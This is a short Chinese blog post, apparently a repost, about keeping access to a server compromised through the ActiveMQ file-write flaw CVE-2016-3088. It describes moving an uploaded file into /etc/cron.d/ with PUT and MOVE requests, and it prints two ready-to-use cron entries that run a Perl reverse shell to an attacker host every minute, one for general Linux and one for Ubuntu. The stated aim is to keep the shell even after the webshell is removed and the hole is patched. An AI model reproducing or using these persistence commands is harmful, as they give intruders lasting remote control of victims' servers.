系统相关
首页 > 系统相关> > 后感-利用crontab完成实时反弹shell

后感-利用crontab完成实时反弹shell

作者:互联网

今天完成ActiveMQ 任意文件写入漏洞(CVE-2016-3088)突然想到一个问题,如果我上传的webshell被清除了且漏洞也修复了我该怎么办,因此有了这篇文章

同样,通过PUT将配置文件上传

通过MOVE方法将配置文件移动至/etc/cron.d/下

 

 上传成功

 监听端口反弹shell

 保持1分钟反弹一次,这样即使连接断开、webshell被清除了且漏洞被修复,也可以拿到shell。

 

crontab反弹shell配置文件

将下列配置文件写入 /etc/cron.d/root ,即可

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ubuntu系统,将配置文件写入 /var/spool/cron/crontabs/root ,且 * 后不需要指定root用户,如下:

*/1 * * * * perl -e 'use Socket;$i="vps.ip";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

标签:bin,shell,配置文件,open,crontab,cron,后感,root
来源: https://www.cnblogs.com/fnkk/p/14237064.html